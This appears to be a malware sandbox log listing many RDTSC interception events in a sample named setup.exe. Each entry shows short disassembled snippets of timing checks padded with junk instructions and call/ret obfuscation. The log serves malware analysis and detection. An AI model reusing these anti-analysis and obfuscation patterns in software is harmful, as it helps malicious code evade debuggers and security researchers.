Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A520A second address: 3A5229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a popad 0x0000000b jne 00007F47D8E3B0C2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F47D8E3B0AAh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5229 second address: 3A522D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A522D second address: 3A5231 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5B6C second address: 3A5B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5D15 second address: 3A5D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A5FFB second address: 3A600D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A600D second address: 3A6012 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AA2E6 second address: 3AA2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3AAAC3 second address: 3AAAE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E3B0B8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3ABD95 second address: 3ABD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3ABD99 second address: 3ABD9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 36E621 second address: 36E632 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F47D8E4826Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B29DA second address: 3B29DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B29DE second address: 3B29EB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E2F second address: 3B2E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007F47D8E3B0A6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E3D second address: 3B2E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2E41 second address: 3B2E67 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007F47D8E3B0A6h 0x00000013 jl 00007F47D8E3B0A6h 0x00000019 popad 0x0000001a ja 00007F47D8E3B0ACh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2F8E second address: 3B2FC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47D8E48266h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F47D8E48277h 0x00000011 jnc 00007F47D8E4826Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B2FC3 second address: 3B2FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B316F second address: 3B3178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 379F7F second address: 379FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F47D8E3B0A6h 0x0000000e popad 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 pushad 0x00000016 jnp 00007F47D8E3B0A6h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push edx 0x00000022 jmp 00007F47D8E3B0B6h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B4EFE second address: 3B4F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B54E3 second address: 3B54FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B55D0 second address: 3B55E9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E4826Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B5FB4 second address: 3B5FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B68E9 second address: 3B68F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B72AA second address: 3B72B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B7143 second address: 3B7147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3B72B0 second address: 3B730F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F47D8E3B0A8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a jnp 00007F47D8E3B0B2h 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 jno 00007F47D8E3B0A8h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 376B15 second address: 376B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA247 second address: 3BA24D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BAB94 second address: 3BAC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F47D8E48276h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F47D8E48268h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c jmp 00007F47D8E48271h 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D3032h] 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007F47D8E48268h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 mov edi, esi 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jg 00007F47D8E4826Ch 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA962 second address: 3BA973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA973 second address: 3BA9A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F47D8E48270h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA9A5 second address: 3BA9AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC16E second address: 3BC188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48276h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BA9AB second address: 3BA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BC188 second address: 3BC18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC65 second address: 3BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC6A second address: 3BCC79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3BCC79 second address: 3BCC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F47D8E3B0A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2CFF second address: 3C2D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1D19 second address: 3C1D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2D03 second address: 3C2D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F47D8E4826Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C3D47 second address: 3C3DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f nop 0x00000010 sub dword ptr [ebp+1247A6F6h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F47D8E3B0A8h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D322Fh] 0x00000038 push 00000000h 0x0000003a sub dword ptr [ebp+122D2CD2h], ecx 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C2F5A second address: 3C2F68 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5F93 second address: 3C5FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5FB3 second address: 3C5FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5FB8 second address: 3C6048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F47D8E3B0A8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F47D8E3B0A8h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000014h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 jmp 00007F47D8E3B0B7h 0x00000045 jmp 00007F47D8E3B0B4h 0x0000004a push 00000000h 0x0000004c mov dword ptr [ebp+122DB73Fh], edx 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C6048 second address: 3C604E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C61DE second address: 3C61FB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E3B0A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e js 00007F47D8E3B0A6h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F47D8E3B0A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C61FB second address: 3C61FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C802B second address: 3C8035 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C718C second address: 3C7192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C903D second address: 3C9078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E3B0B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F47D8E3B0B8h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C9078 second address: 3C912F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F47D8E48268h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bl, 91h 0x00000026 xor di, 03CBh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push esi 0x00000030 call 00007F47D8E48268h 0x00000035 pop esi 0x00000036 mov dword ptr [esp+04h], esi 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc esi 0x00000043 push esi 0x00000044 ret 0x00000045 pop esi 0x00000046 ret 0x00000047 mov di, D0D5h 0x0000004b xor ebx, 6BC0166Bh 0x00000051 mov edi, 6E2E0A33h 0x00000056 push 00000000h 0x00000058 call 00007F47D8E4826Ah 0x0000005d mov di, 9A30h 0x00000061 pop ebx 0x00000062 jl 00007F47D8E48274h 0x00000068 jmp 00007F47D8E4826Eh 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 pushad 0x00000072 popad 0x00000073 jmp 00007F47D8E48277h 0x00000078 popad 0x00000079 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C912F second address: 3C9135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C9135 second address: 3C9139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB00E second address: 3CB0A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F47D8E3B0B3h 0x00000010 jmp 00007F47D8E3B0ADh 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F47D8E3B0A8h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov dword ptr [ebp+122D24DDh], edi 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 xor dword ptr [ebp+122D2CD2h], edx 0x0000003f pop ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F47D8E3B0A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c and di, 840Bh 0x00000061 mov ebx, dword ptr [ebp+122D38ACh] 0x00000067 mov ebx, dword ptr [ebp+122D3854h] 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 pop edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB0A9 second address: 3CB0AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CB0AE second address: 3CB0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F47D8E3B0B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD17B second address: 3CD17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CD17F second address: 3CD183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401B19 second address: 401B23 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47D8E3B0ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 401368 second address: 4013B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 jmp 00007F47D8E48273h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007F47D8E48268h 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F47D8E48272h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4016C4 second address: 4016C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4016C9 second address: 4016E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F47D8E48274h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403F9D second address: 403FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403FA5 second address: 403FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47D8E48270h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700B8 second address: 3700C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700C5 second address: 3700D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3700D1 second address: 3700D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403B58 second address: 403B60 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 403CCA second address: 403CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE6B second address: 40AE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE71 second address: 40AE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE75 second address: 40AE79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE79 second address: 40AE7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AE7F second address: 40AEAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E4826Ch 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F47D8E4826Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007F47D8E48266h 0x0000001f push edi 0x00000020 pop edi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEAF second address: 40AEC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEC2 second address: 40AEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48279h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE1 second address: 40AEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE5 second address: 40AEE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
